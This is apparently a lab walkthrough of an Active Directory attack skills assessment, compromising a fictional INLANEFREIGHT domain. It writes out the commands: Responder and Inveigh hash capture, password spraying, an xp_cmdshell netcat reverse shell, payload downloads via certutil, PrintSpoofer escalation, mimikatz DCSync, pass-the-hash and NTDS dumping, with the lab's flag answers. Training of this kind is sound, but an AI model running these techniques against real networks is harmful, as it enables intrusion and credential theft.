# Next, from the Kali machine, serve the PSUpload.ps1 file to the pivot machine (
python3 -m http.server 9001
# Retrieve the PSUpload.ps1 file on the pivot machine:
Invoke-WebRequest -OutFile PSUpload.ps1
# Start an uploader server on the Kali machine:
python3 -m uploadserver
# From the pivot host, upload the generated collector file to the Kali machine:
Import-Module .\PSUpload.ps1; Invoke-FileUpload -Uri -File C:\windows\system32\inetsrv\20250106032426_enum.zip
# Start the Neo4j server on the Kali machine:
sudo neo4j console
# Open BloodHound:
# In BloodHound, search for the node "tpetty." Set it as the starting node.
# In the "Node Info" blade, scroll down to "Outbound Object Control" and check the "First Degree Object Control" section.
# Confirm that the user has DCSync permissions over INLANEFREIGHT.LOCAL.
Results: DCSync
Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01
| # Get the User TPetty's SID:
Import-Module .\PowerView.ps1; Get-DomainUser -Identity TPETTY |select samaccountname,objectsid,memberof,useraccountcontrol |fl
# With the $sid, checkout the replication rights:
Import-Module .\PowerView.ps1; $sid= "S-1-5-21-2270287766-1317258649-2146029398-4607"; Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl
# However we already knew this from the Bloodhound analysis.
# Now we open a powershell as TPETTY user in the target host and launch mimikatz.exe
# Now we can request the domain to dump the NTLM hashes as Administrators:
lsadump::dcsync /domain:inlanefreight.local /user:Administrator
# And now from our attacker machine, we can retrieve the flag launching a pass the hash attack
proxychains crackmapexec smb -u Administrator -H "27dedb1dab4d8545c6e1c66fba077da0" -d INLANEFREIGHT.LOCAL -x 'type c:\Users\Administrator\Desktop\flag.txt' --exec-method smbexec
Results: r3plicat1on_m@st3r!
AD Enumeration & Attacks - Skills Assessment Part II
Obtain a password hash for a domain user account that can be leveraged to gain a foothold in the domain.
| # Access the pivot machine using two separate terminals:
ssh $user@$ip
# In one terminal, set up a Responder server:
ip a
responder -I ens224
# In the other terminal, perform a reconnaissance scan using Nmap:
nmap -T4 -A -oN scan.txt
# The Responder server will capture several user credentials during the scan.
Results: AB920
What is this user's cleartext password?
| # Open the responder log
cd /usr/share/responder/logs
ls -la
cat cat SMB-NTLMv2-SSP-
# Crack the hash
hashcat -m 5600 AB920 /usr/share/wordlists/rockyou.txt
Results: weasal
Submit the contents of the C:\flag.txt file on MS01.
| # Launch a reverse proxy. From you kali terminal, use a ssh reverse proxy. In my case, I had already set in /etc/proxychains4.conf the port 1080, so I will use the same
ssh htb-student@ -D 1080
# In another terminal from your attacker machine:
proxychains xfreerdp /v: /u:AB920 /cert:ignore
# When prompted, enter the creds: weasal
# Open a powershell terminal and
cat c:\flag.txt
Results: aud1t_gr0up_m3mbersh1ps!
Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.
| # Establish an SSH connection with a SOCKS reverse proxy:
ssh htb-student@$ip -D 1080
# Perform host enumeration by connecting to using RDP:
proxychains xfreerdp /v: /u:AB920 /cert:ignore
# Enumerate the password policy from the Kali attacking machine:
proxychains crackmapexec smb -u AB920 -p weasal --pass-pol
| # Enumerate user accounts on the target machine:
proxychains crackmapexec smb -u AB920 -p weasal --users > users.txt
# Extract and format the list of users to keep only usernames:
sed -E 's/.*INLANEFREIGHT\.LOCAL\\([A-Z0-9]+).*/\1/' users.txt > final.txt
# Perform a password spray attack from the Kali terminal:
proxychains crackmapexec smb -u final.txt -p /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt --no-bruteforce
# Note: This process may take some time.
# Conduct a brute-force attack using Hydra:
proxychains hydra -L ~/borrar/final.txt -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt smb://
Results: BR086
What is this user's password?
Results: Welcome1
Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?
| # Enumerate shared directories on DC01.
proxychains smbmap -u BR086 -p Welcome1 -d INLANEFREIGHT.LOCAL -H -r
# Method 1: Using RDP and File Explorer
# After confirming access, connect to the MS01 host ( using RDP:
proxychains xfreerdp /v: /u:BR086 /cert:ignore
# On the RDP session, open File Explorer and enter the following address in the address bar:
# View the available shares on DC01.INLANEFREIGHT.LOCAL. Navigate to:
\\\Department Shares\IT\Private\Development
# Locate the `web.config` file within this directory.
# Method 2: Accessing shares directly from the Kali terminal
# Use `smbmap` to list contents of the "Department Shares" directory:
proxychains smbmap -u BR086 -p Welcome1 -d INLANEFREIGHT.LOCAL -H -R "Department Shares"
# Use `smbclient` to connect to the "Department Shares" directory:
proxychains smbclient "// Shares" -U "inlanefreight\BR086"
# Navigate to the desired path:
cd IT/Private/Development
# Retrieve the `web.config` file:
get web.config
# View the contents of the retrieved file:
cat web.config
Results: D@ta_bAse_adm1n!
user: netdb
Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
| # Using the user credentials from the previous exercise, we access the MSSQL database:
proxychains sqsh -S -U netdb -P 'D@ta_bAse_adm1n!' -h
# Attempting to access the flag, but we lack the necessary permissions:
EXEC xp_cmdshell 'type c:\Users\Administrator\Desktop\flag.txt'
# Next, we will execute an attack to capture the MSSQL Service Hash.
# First, we will run Responder on the Parrot pivot machine (
sudo responder -I tun0
# Then, from the database connection, we will attempt to connect to a share:
EXEC master..xp_dirtree '\\\share\'
# Responder will capture the hash:
[SMB] NTLMv2-SSP Client :
[SMB] NTLMv2-SSP Hash : SQL01$::INLANEFREIGHT:990b191e92859598:DF973B2CBBD93043B5EDFFF6759136CC:01010000000000000022FC45F460DB018568A6F6B8DD56FA0000000002000800590032004200300001001E00570049004E002D004E004100370059004A004100480045004E003300550004003400570049004E002D004E004100370059004A004100480045004E00330055002E0059003200420030002E004C004F00430041004C000300140059003200420030002E004C004F00430041004C000500140059003200420030002E004C004F00430041004C00070008000022FC45F460DB0106000400020000000800300030000000000000000000000000300000011450EFCD9DCCD865F6DC7EB88F78C1416D20A04A5E33C2E24A3FD09103F3C70A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0037002E003200340030000000000000000000
# However, this doesn't yield any results (I attempted to access services/machines using CrackMapExec). So, I eventually obtained a simple reverse shell by exploiting the SQL server to enumerate more easily.
# First, I uploaded nc64.exe to the pivot host ( Then, I served the file to
python3 -m http.server 9001
# From the terminal with the connection to the server (, I uploaded the file to SQL01:
xp_cmdshell "powershell -c cd C:\Users\Public\Downloads; Invoke-WebRequest -outfile nc64.exe"
# Verify the file has been uploaded:
xp_cmdshell "powershell -c dir C:\Users\Public\Downloads"
# Start a listener on the Parrot pivot machine (
nc -lnvp 5665
# Now, establish the reverse connection:
xp_cmdshell "powershell -c cd C:\Users\Public\Downloads; .\nc64.exe -e cmd.exe 5665"
# On the Parrot pivot machine, we now have a reverse shell from We can begin enumeration.
whoami /priv
# We will notice the following privileges:
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process-level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
# We will exploit SeImpersonatePrivilege, which allows us to elevate from LOCAL/NETWORK SERVICE to SYSTEM by leveraging the PrintSpoofer vulnerability on Windows 10 and Server 2016/2019.
# On your Kali machine, download the PrintSpoofer executable from https://github.com/itm4n/PrintSpoofer. Transfer the file to the Parrot pivot host ( Then, on the Parrot pivot host, serve the file:
python3 -m http.server 9001
# From the reverse shell terminal (, download the file:
powershell -c cd C:\Users\Public\Downloads; Invoke-WebRequest -outfile PrintSpoofer64.exe
# From the reverse shell terminal (, execute the PrintSpoofer tool:
.\PrintSpoofer64.exe -i -c cmd.exe
# Verify the current user:
# Finally, retrieve the flag:
type c:/Users/Administrator/Desktop/flag.txt
Results: s3imp3rs0nate_cl@ssic
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
| # We have gained admin rights on the host SQL01 ( From there, we will use Mimikatz. To do so, we need to transfer the Mimikatz executable from our Kali machine to the Parrot pivot machine.
# On Kali:
python3 -m http.server 9001
# On the Parrot pivot machine:
# Now, we will serve the file from the Parrot pivot machine:
python3 -m http.server 9001
# From the reverse shell on SQL01 (, open PowerShell and download the file:
certutil -urlcache -split -f mimikatz.exe
# Run Mimikatz and list the users logged into the machine and still in memory:
sekurlsa::logonPasswords full
# We will notice this user with the NTLM hash:
# mssqlsvc
# NTLM: 8c9555327d95f815987c0d81238c7660
####### Way 1
# Now, from our Kali machine, we will use the SSH reverse proxy established earlier with `ssh $user@$ip -D 9050` to access the MS01 target machine. We will use the Pass-The-Hash technique:
proxychains crackmapexec smb -u mssqlsvc -H 8c9555327d95f815987c0d81238c7660 -d INLANEFREIGHT.LOCAL
# Dumping SAM hashes:
proxychains crackmapexec smb -u mssqlsvc -H 8c9555327d95f815987c0d81238c7660 -d INLANEFREIGHT.LOCAL --sam
# SMB 445 MS01 [+] Dumping SAM hashes
# SMB 445 MS01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:bdaffbfe64f1fc646a3353be1c2c3c99:::
# SMB 445 MS01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# SMB 445 MS01 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# SMB 445 MS01 WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4b4ba140ac0767077aee1958e7f78070:::
# SMB 445 MS01 [+] Added 4 SAM hashes to the database
# NTDS dump:
proxychains crackmapexec smb -u mssqlsvc -H 8c9555327d95f815987c0d81238c7660 -d INLANEFREIGHT.LOCAL --ntds
#### [+] Dumped 0 NTDS hashes
# Now, we can extract the flag:
# First, check the user:
proxychains crackmapexec smb -u mssqlsvc -H bdaffbfe64f1fc646a3353be1c2c3c99 -d INLANEFREIGHT.LOCAL -x 'whoami' --exec-method smbexec
# Result: nt authority\system
# Now, print the flag.txt:
proxychains crackmapexec smb -u mssqlsvc -H 8c9555327d95f815987c0d81238c7660 -d INLANEFREIGHT.LOCAL -x 'type c:\Users\Administrator\Desktop\flag.txt' --exec-method smbexec
####### Way 2
# Another way is to open an RDP connection using Pass-the-Hash:
proxychains xfreerdp /v: /u:mssqlsvc /pth:8c9555327d95f815987c0d81238c7660 /cert-ignore
# We encounter an issue: **Restricted Admin Mode** is disabled by default on the target host, which results in an error. To proceed, we need to enable this mode.
# As we have command execution access via CrackMapExec on, we will add a registry key `DisableRestrictedAdmin` (REG_DWORD) under `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa` with a value of 0.
proxychains crackmapexec smb -u mssqlsvc -H 8c9555327d95f815987c0d81238c7660 -d INLANEFREIGHT.LOCAL -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f' --exec-method smbexec
# Now we can access the target via RDP:
proxychains xfreerdp /v: /u:mssqlsvc /pth:8c9555327d95f815987c0d81238c7660 /cert-ignore
# Finally, open PowerShell as Admin and read the file.
Results: exc3ss1ve_adm1n_r1ights!
Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?
| # We have obtained a foothold with administrative rights on the MS01 host ( From here, we will use SharpHound to collect Active Directory data. First, we transfer the SharpHound executable from our Kali machine to the Parrot pivot machine.
# On the Kali machine:
python3 -m http.server 9001
# On the Parrot pivot machine:
# Serve the SharpHound executable from the Parrot pivot machine:
python3 -m http.server 9001
# From the MS01 host ( via RDP:
proxychains xfreerdp /v: /u:mssqlsvc /pth:8c9555327d95f815987c0d81238c7660 /cert-ignore
# Open a PowerShell terminal and download the SharpHound executable:
certutil -urlcache -split -f SharpHound.exe
# Run the SharpHound collector on MS01 (
.\SharpHound.exe -c All --zipfilename enum
# Save the collected data in the `C:\Users\Public\Downloads` folder. Configure the folder to be shared on the network. Once shared, download the collected data to the Kali machine:
proxychains smbclient "//" -U "inlanefreight\BR086"
cd Public
cd Downloads
get file_enum.zip
# Open BloodHound for analysis:
# In one terminal, start the Neo4j database:
sudo neo4j console
# In another terminal, launch BloodHound:
# Upload the collected data file (file_enum.zip) to BloodHound.
# Set `DOMAIN.ADMINS` as the starting node for analysis. In the Node tab, click on "Inbound Control Rights" > "Explicit Objects Controllers" and identify the user `CT059`.
Results: CT059
Crack this user's password hash and submit the cleartext password as your answer.
| # Upload Inveigh.exe to the MS01 machine:
# From the Parrot pivot machine (, start a Python HTTP server:
python3 -m http.server 9001
# From the MS01 host machine (, download the file using CertUtil:
certutil -urlcache -split -f Inveigh.exe
# Run Inveigh.exe on the MS01 host machine (
# After some time, observe the captured NTLMv2 hash:
[+] SMB(445) NTLMv2 captured for [INLANEFREIGHT\CT059] from (DC01):51255:
# Crack the captured NTLMv2 hash using Hashcat:
hashcat -m 5600 CT059 /usr/share/wordlists/rockyou.txt
Results: charlie1
Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.
| # First, we test our connection:
proxychains crackmapexec smb -u CT059 -p charlie1 -d INLANEFREIGHT.LOCAL
# We observe that this user has a GenericAll ACL over the domain, meaning they have the ability to add another user to the Domain Admins group, for example.
# To proceed, we first open a terminal session on MS01. For this, we need to modify the registry:
proxychains crackmapexec smb -u mssqlsvc -H 8c9555327d95f815987c0d81238c7660 -d INLANEFREIGHT.LOCAL -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f' --exec-method smbexec
# With the registry modified, we can now establish an RDP connection:
proxychains xfreerdp /v: /u:mssqlsvc /pth:8c9555327d95f815987c0d81238c7660 /cert-ignore
# Once connected, open a PowerShell terminal as Administrator and download the PowerView.ps1 module from the Parrot pivot machine (
certutil -urlcache -split -f PowerView.ps1
# Using the PowerView module, the user CT059 will add AB920 to the Domain Admins group:
$SecPassword = ConvertTo-SecureString 'charlie1' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\CT059', $SecPassword)
Import-Module .\PowerView.ps1
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'AB920' -Credential $Cred
# Now, with the AB920 account in the Domain Admins group, we can proceed to dump the NTDS:
proxychains crackmapexec smb -u AB920 -p weasal -d INLANEFREIGHT.LOCAL --ntds
# Confirming that the connection is successful:
proxychains crackmapexec smb -u Administrator -H '234a798328eb83fda24119597ffba70b' -x 'whoami' --exec-method smbexec
# Finally, dumping the flag:
proxychains crackmapexec smb -u Administrator -H '234a798328eb83fda24119597ffba70b' -x 'type c:\Users\Administrator\Desktop\flag.txt' --exec-method smbexec
Results: acLs_f0r_th3_w1n!
Submit the NTLM hash for the KRBTGT account for the target domain after achieving domain compromise.
| proxychains crackmapexec smb -u AB920 -p weasal -d INLANEFREIGHT.LOCAL --ntds
# Krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7eba70412d81c1cd030d72a3e8dbe05f:::
Results: 7eba70412d81c1cd030d72a3e8dbe05f
Last update: 2025-01-26
Created: January 26, 2025 19:15:53